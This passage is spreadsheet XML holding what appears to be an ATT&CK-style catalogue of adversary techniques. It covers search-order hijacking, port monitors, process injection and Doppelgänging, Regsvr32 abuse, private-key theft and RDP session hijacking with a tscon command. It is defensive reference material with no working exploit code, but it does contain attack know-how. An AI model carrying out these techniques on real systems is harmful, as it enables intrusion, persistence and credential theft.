        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.</t>
    </r>
  </si>
  <si>
    <r>
      <t>For example, if </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>C:\example path</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> precedes </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>C:\Windows\system32</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> is in the PATH environment variable, a program that is named net.exe and placed in </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>C:\example path</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> will be called instead of the Windows system "net" when "net" is executed from the command-line.</t>
    </r>
  </si>
  <si>
    <t>Search Order Hijacking</t>
  </si>
  <si>
    <r>
      <t>Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. The search order differs depending on the method that is used to execute the program.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>115246247</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>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t>
    </r>
  </si>
  <si>
    <t>For example, "example.exe" runs "cmd.exe" with the command-line argument net user. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then cmd.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT.248</t>
  </si>
  <si>
    <t>Search order hijacking is also a common practice for hijacking DLL loads and is covered in DLL Search Order Hijacking.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1069</t>
  </si>
  <si>
    <t>Adversaries may attempt to find local system or domain-level groups and permissions settings.</t>
  </si>
  <si>
    <t>Examples of commands that can list groups are net group /domain and net localgroup using the Net utility.</t>
  </si>
  <si>
    <r>
      <t>On Mac, this same thing can be accomplished with the </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>dscacheutil -q group</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> for the domain, or </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>dscl . -list /Groups</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> for local groups.</t>
    </r>
  </si>
  <si>
    <r>
      <t>On Linux, local groups can be enumerated with the </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>groups</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> command and domain groups via the </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>ldapsearch</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> command.</t>
    </r>
  </si>
  <si>
    <t>T1013</t>
  </si>
  <si>
    <r>
      <t>A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>249</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> This DLL can be located in </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>C:\Windows\System32</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>250</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. The Registry key contains entries for the following:</t>
    </r>
  </si>
  <si>
    <t>Local Port</t>
  </si>
  <si>
    <t>Standard TCP/IP Port</t>
  </si>
  <si>
    <t>USB Monitor</t>
  </si>
  <si>
    <t>WSD Port</t>
  </si>
  <si>
    <t>Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.</t>
  </si>
  <si>
    <t>T1086</t>
  </si>
  <si>
    <t>PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.251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t>
  </si>
  <si>
    <t>PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.</t>
  </si>
  <si>
    <t>Administrator permissions are required to use PowerShell to connect to remote systems.</t>
  </si>
  <si>
    <r>
      <t>A number of PowerShell-based offensive testing tools are available, including Empire,</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>252</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> PowerSploit,</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>253</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and PSAttack.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>254</t>
    </r>
  </si>
  <si>
    <t>T1145</t>
  </si>
  <si>
    <t>Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.255</t>
  </si>
  <si>
    <t>Adversaries may gather private keys from compromised systems for use in authenticating to Remote Services like SSH or for use in decrypting other collected files such as email. Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, pfx, .cer, .p7b, .asc. Adversaries may also look in common key directories, such as ~/.ssh for SSH keys on *nix-based systems or C:\Users\(username)\.ssh\ on Windows.</t>
  </si>
  <si>
    <r>
      <t>Private keys should require a password or passphrase for operation, so an adversary may also use </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Input Capture</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> for keylogging or attempt to </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Brute Force</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> the passphrase off-line.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Adversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>256257</t>
    </r>
  </si>
  <si>
    <t>T1057</t>
  </si>
  <si>
    <t>Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network.</t>
  </si>
  <si>
    <t>An example command that would obtain details on processes is "tasklist" using the Tasklist utility.</t>
  </si>
  <si>
    <r>
      <t>In Mac and Linux, this is accomplished with the </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>ps</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> command.</t>
    </r>
  </si>
  <si>
    <t>T1186</t>
  </si>
  <si>
    <r>
      <t>Windows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>258</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>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t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>259</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>260</t>
    </r>
  </si>
  <si>
    <t>Although deprecated, the TxF application programming interface (API) is still enabled as of Windows 10.261</t>
  </si>
  <si>
    <r>
      <t>Adversaries may leverage TxF to a perform a file-less variation of </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Process Injection</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> called Process Doppelgänging. Similar to </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Process Hollowing</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, Process Doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process Doppelgänging's use of TxF also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>261</t>
    </r>
  </si>
  <si>
    <t>Process Doppelgänging is implemented in 4 steps261:</t>
  </si>
  <si>
    <t>Transact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.</t>
  </si>
  <si>
    <t>Load – Create a shared section of memory and load the malicious executable.</t>
  </si>
  <si>
    <t>Rollback – Undo changes to original executable, effectively removing malicious code from the file system.</t>
  </si>
  <si>
    <t>Animate – Create a process from the tainted section of memory and initiate execution.</t>
  </si>
  <si>
    <t>T1093</t>
  </si>
  <si>
    <r>
      <t>Process hollowing occurs when a process is created in a suspended state then its memory is unmapped and replaced with malicious code. Similar to </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Process Injection</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, execution of the malicious code is masked under a legitimate process and may evade defenses and detection analysis.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2629</t>
    </r>
  </si>
  <si>
    <t>T1055</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</si>
  <si>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</si>
  <si>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There are multiple approaches to injecting code into a live process. Windows implementations include:9</t>
  </si>
  <si>
    <r>
      <t>Dynamic-link library (DLL) injection</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> involves writing the path to a malicious DLL inside a process then invoking execution by creating a remote thread.</t>
    </r>
  </si>
  <si>
    <t>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issue.263</t>
  </si>
  <si>
    <t>Thread execution hijacking involves injecting malicious code or the path to a DLL into a thread of a process. Similar to Process Hollowing, the thread must first be suspended.</t>
  </si>
  <si>
    <r>
      <t>Asynchronous Procedure Call</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> (APC) injection involves attaching malicious code to the APC Queue</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>264</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> of a process's thread. Queued APC functions are executed when the thread enters an alterable state. AtomBombing </t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>265</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> is a variation that utilizes APCs to invoke malicious code previously written to the global atom table.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>266</t>
    </r>
  </si>
  <si>
    <t>Thread Local Storage (TLS) callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point.267</t>
  </si>
  <si>
    <r>
      <t>Implementations for Linux and OS X/macOS systems include:</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>268269</t>
    </r>
  </si>
  <si>
    <t>LD_PRELOAD, LD_LIBRARY_PATH (Linux), DYLD_INSERT_LIBRARIES (Mac OS X) environment variables, or the dlfcn application programming interface (API) can be used to dynamically load a library (shared object) in a process which can be used to intercept API calls from the running process.270</t>
  </si>
  <si>
    <t>Ptrace system calls can be used to attach to a running process and modify it in runtime.269</t>
  </si>
  <si>
    <t>/proc/[pid]/mem provides access to the memory of the process and can be used to read/write arbitrary data to it. This technique is very rare due to its complexity.269</t>
  </si>
  <si>
    <t>VDSO hijacking performs runtime injection on ELF binaries by manipulating code stubs mapped in from the linux-vdso.so shared object.271</t>
  </si>
  <si>
    <t>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</si>
  <si>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T1012</t>
  </si>
  <si>
    <t>Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software. The Registry contains a significant amount of information about the operating system, configuration, software, and security.272 Some of the information may help adversaries to further their operation within a network.</t>
  </si>
  <si>
    <t>T1108</t>
  </si>
  <si>
    <r>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t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Valid Accounts</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>to use </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>External Remote Services</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> such as external VPNs as a way to maintain access despite interruptions to remote access tools deployed within a target network.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>273</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> Use of a </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Web Shell</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> is one such way to maintain access to a network through an externally accessible Web server.</t>
    </r>
  </si>
  <si>
    <t>T1060</t>
  </si>
  <si>
    <r>
      <t>Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>274</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>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t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Masquerading</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> to make the Registry entries look as if they are associated with legitimate programs.</t>
    </r>
  </si>
  <si>
    <t>T1121</t>
  </si>
  <si>
    <r>
      <t>Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies. Both are digitally signed by Microsoft.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>275276</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> Adversaries can use Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Both utilities may be used to bypass process whitelisting through use of attributes within the binary to specify code that should be run before registration or unregistration: </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>[ComRegisterFunction]</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> or </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>[ComUnregisterFunction]</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>174</t>
    </r>
  </si>
  <si>
    <t>T1117</t>
  </si>
  <si>
    <t>Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries.277</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <r>
      <t>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t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>278</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> This variation of the technique is often referred to as a "Squiblydoo" attack and has been used in campaigns targeting governments.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>279280</t>
    </r>
  </si>
  <si>
    <r>
      <t>Regsvr32.exe can also be leveraged to register a COM Object used to establish </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Persistence</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> via </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Component Object Model Hijacking</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>279</t>
    </r>
  </si>
  <si>
    <t>T1219</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</si>
  <si>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adversaries.281</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <r>
      <t>Admin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>282283</t>
    </r>
  </si>
  <si>
    <t>T1076</t>
  </si>
  <si>
    <r>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t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>284</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> There are other implementations and third-party tools that provide graphical access </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Remote Services</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> similar to RDS.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Credential Access</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Accessibility Features</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> technique for </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Persistence</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>285</t>
    </r>
  </si>
  <si>
    <r>
      <t>Adversaries may also perform RDP session hijacking which involves stealing a legitimate user's remote session. Typically, a user is notified when someone else is trying to steal their session and prompted with a question. With System permissions and using Terminal Services Console, </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>c:\windows\system32\tscon.exe [session number to be stolen]</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, an adversary can hijack a session without the need for credentials or prompts to the user.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>286</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> This can be done remotely or locally and with active or disconnected sessions.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>287</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> It can also lead to </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Remote System Discovery</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Privilege Escalation</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in RedSnarf.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>288</t>
    </r>
  </si>
  <si>
    <t>T1105</t>
  </si>
  <si>
    <r>
      <t>Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Files may be copied from an external adversary-controlled system through the </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Command and Control</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> channel to bring tools into the victim network or through alternate protocols with another tool such as </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>FTP</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp. Adversaries may also copy files laterally between internal victim systems to support </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Lateral Movement</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> with remote </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Execution</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
